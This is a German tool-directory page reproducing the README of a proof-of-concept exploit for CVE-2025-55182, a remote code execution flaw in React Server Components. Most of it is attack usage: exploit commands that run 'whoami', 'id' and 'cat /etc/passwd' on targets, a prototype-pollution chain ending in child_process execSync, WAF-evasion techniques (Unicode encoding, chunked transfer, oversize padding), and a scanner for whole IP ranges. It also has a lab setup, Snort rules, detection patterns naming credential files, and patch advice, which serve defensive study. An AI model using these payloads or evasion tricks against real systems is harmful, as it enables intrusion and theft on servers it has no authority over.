Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182-POC — CVE-2025-55182-POC | Kitploit
Tools/GitHubGitHub/zxz3650/cve-2025-55182-poc
SchwachstellenanalyseExploitationIDS/IPS-UmgehungWebanwendungs-ExploitationWAF-UmgehungPenetrationstestsPayload-Entwicklung
GitHubzxz3650/cve-2025-55182-poc

CVE-2025-55182-POC

CVE-2025-55182-POC

Repository anzeigen
15vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 POC & Erkennung

React Server Components (RSC) Unsafe Deserialization – Sammlung von Exploit- und Erkennungstools für die Sicherheitslücke

Informationen zur Sicherheitslücke

  • CVE-ID: CVE-2025-55182
  • Betroffene Versionen: React 19.x, Next.js 15.x/16.x (bei Verwendung des App Router)
  • Angriffsvektor: RCE durch Prototype Pollution bei der Deserialisierung des RSC Flight-Protokolls
  • Risikostufe: Critical (CVSS 10.0)

📦 Komponenten

1. Verwundbare Umgebung (Docker)

  • docker-compose.yml – Next.js 15.0.3 + React 19.0.0-rc
  • vulnerable-app/ – Verwundbarer Server Action-Code

2. Exploit-Tools

  • exploit_advanced.py – Unterstützt mehrere Angriffstechniken (Basic/Advanced/Chunked/Oversize)

3. Schwachstellenscanner

Tool herunterladen
  • rsc_vulnerability_checker_multi.py – Multi-Target-Schwachstellendiagnosetool

4. IDS-Erkennungsregeln

  • rules_priority_based – Snort-priorisierte Erkennungsregelsammlung

🚀 Quick Start

1. Aufbau der verwundbaren Umgebung

root@kitploit:~
cd vulnerable-app
docker-compose up -d
# http://localhost:3000 aufrufen

2. Schwachstellendiagnose

root@kitploit:~
# Einzel-URL-Test
python3 rsc_vulnerability_checker_multi.py http://localhost:3000

# Batch-Scan mehrerer URLs
python3 rsc_vulnerability_checker_multi.py http://site1.com http://site2.com

# IP-Bereich-Scan
python3 rsc_vulnerability_checker_multi.py -r 192.168.1.1-254 -p 3000 --threads 20

# Aus Datei lesen
python3 rsc_vulnerability_checker_multi.py -f targets.txt -o results.csv

3. Exploit-Ausführung

root@kitploit:~
# Basisangriff
python3 exploit_advanced.py -u http://localhost:3000 -c "whoami" --basic

# Erweiterter Angriff (Prototype Chain + thenable)
python3 exploit_advanced.py -u http://localhost:3000 -c "id" --advanced

# WAF-Umgehung – Unicode-Kodierung
python3 exploit_advanced.py -u http://target.com -c "cat /etc/passwd" --advanced --waf-bypass

# WAF-Umgehung – Chunked Transfer Encoding
python3 exploit_advanced.py -u http://target.com -c "uname -a" --chunked

# WAF-Umgehung – Oversize-Payload (AWS WAF)
python3 exploit_advanced.py -u http://target.com -c "id" --oversize 65536

# Alle Techniken nacheinander ausprobieren
python3 exploit_advanced.py -u http://target.com -c "whoami" --all -v

4. Netzwerkerkennungstest

root@kitploit:~
# Angriffsverkehr aufzeichnen
sudo tcpdump -i lo0 -w attack.pcap 'port 3000' &
python3 exploit_advanced.py -u http://localhost:3000 -c "id" --all
sudo pkill tcpdump

# Mit Snort analysieren
snort -c snort.conf -r attack.pcap -A console -k none

Detaillierte Exploit-Techniken

Basic Mode

Direkte Übertragung der RSC Flight-Payload

root@kitploit:~
# Server Action direkt aufrufen
POST /?__rsc_action__ HTTP/1.1
Content-Type: text/plain
next-action: <action_id>

["$@1",["$","$L2",null,{...}]]

Advanced Mode

RCE mittels Prototype Pollution

root@kitploit:~
// Kernprinzip
{
  "then": "$1:__proto__:then",           // Chunk.prototype.then auslösen
  "_response": {                          // Fake-Response injizieren
    "_formData": {...},
    "_prefix": ""
  },
  "$1:constructor:constructor": Function  // Zugriff auf Function-Konstruktor
}

Angriffskette:

  1. __proto__-Verschmutzung setzt Chunk.prototype.then
  2. Injektion von _response-Objekt zur Kontrolle von FormData
  3. Der $B-Handler ruft response._formData.get(id) auf
  4. constructor:constructor-Kette ermöglicht Zugriff auf Function
  5. Ausführung von process.mainModule.require('child_process').execSync(cmd)

Chunked Mode

Musterverteilung mittels Transfer-Encoding

root@kitploit:~
POST /?__rsc_action__ HTTP/1.1
Transfer-Encoding: chunked

10
["$@1",["$","
15
$L2",null,{"then
...
  • Umgehung von WAF-Pattern-Matching (Schlüsselwortaufteilung)
  • Nicht als einzelner Puffer prüfbar

Oversize Mode

Umgehung der AWS WAF-Größenbeschränkung

root@kitploit:~
payload = original_payload + "X" * (size - len(original_payload))
# AWS WAF: Prüft nur die ersten 8 KB
# Tatsächlicher Angriffscode nach 8 KB platziert

📊 Erkennungsregel-Prioritäten

P0-Regeln (SID 2000xxx) – Sofortige Blockierung

  • process.mainModule.require + child_process + execSync
  • __proto__ + resolved_model + RCE-Modul
  • Zugriff auf /etc/passwd, /etc/shadow, .ssh/id_rsa

📋 Anforderungen

Erforderlich

  • Docker & Docker Compose
  • Python 3.8+
  • requests-Bibliothek
    root@kitploit:~
    pip install requests
    

Optional (für Erkennungstests)

  • Snort 2.9+
  • tcpdump

🔍 Verwendung des Schwachstellenscanners

Grundlegende Verwendung

root@kitploit:~
# Einzel-URL
python3 rsc_vulnerability_checker_multi.py http://target.com

# Mehrere URLs
python3 rsc_vulnerability_checker_multi.py http://site1.com http://site2.com

Erweiterte Verwendung

root@kitploit:~
# IP-Bereich-Scan (CIDR)
python3 rsc_vulnerability_checker_multi.py -r 192.168.1.0/24 -p 3000

# IP-Bereich-Scan (Bindestrich)
python3 rsc_vulnerability_checker_multi.py -r 10.0.0.1-254 -p 8080 --threads 50

# Dateieingabe/-ausgabe
python3 rsc_vulnerability_checker_multi.py -f targets.txt -o scan_results.csv

# Verbose-Modus
python3 rsc_vulnerability_checker_multi.py http://target.com -v

Ausgabeformat

root@kitploit:~
[VULNERABLE] http://target.com:3000 – React 19.0.0-rc, Next.js 15.0.3
[SAFE] http://example.com:3000 – Nicht verwundbar
[ERROR] http://offline.com:3000 – Verbindungszeitüberschreitung

🎯 Exploit-Tool-Optionen

Angriffsmodi

  • --basic: Direkte RSC Flight-Payload-Übertragung
  • --advanced: Prototype Chain + thenable-Technik
  • --chunked: Transfer-Encoding-Aufteilung
  • --oversize <size>: Oversize-Payload (Standard: 65536 Bytes)
  • --all: Alle Techniken nacheinander ausprobieren

WAF-Umgehung

  • --waf-bypass: Unicode-Kodierung (constructor → \u0063onstructor)
  • --chunked: Musterverteilung
  • --oversize: Umgehung der AWS WAF-Größenbeschränkung

Sonstiges

  • -v, --verbose: Detaillierte Ausgabe
  • -t, --timeout: Anfrage-Timeout (Standard: 10 Sekunden)

🛡 Verteidigung und Erkennung

Anwendungsebene

  1. Upgrade von React 19.0.0-rc auf 19.0.0 (stabil)
  2. Upgrade von Next.js 15.0.3 auf 15.1.0+
  3. Verstärkte Eingabevalidierung für Server Actions
  4. Deaktivierung von experimental-Funktionen

Netzwerkebene

  1. Anwendung der Snort-Regeln (rules_priority_based)
  2. WAF-Richtlinien:
    • Blockierung des __proto__-Schlüsselworts
    • Blockierung des process.mainModule.require-Musters
    • Beschränkung der POST-Body-Größe (< 1 MB)
  3. Rate-Limiting (Begrenzung der Server Action-Anfragen)

Überwachung

root@kitploit:~
# Snort-Echtzeitüberwachung
snort -c snort.conf -i eth0 -A console

# Logdatei-Analyse
snort -c snort.conf -r network.pcap -A fast

Dieser Beitrag ist nur für Forschungs-, Bildungs- und Diagnosezwecke bestimmt.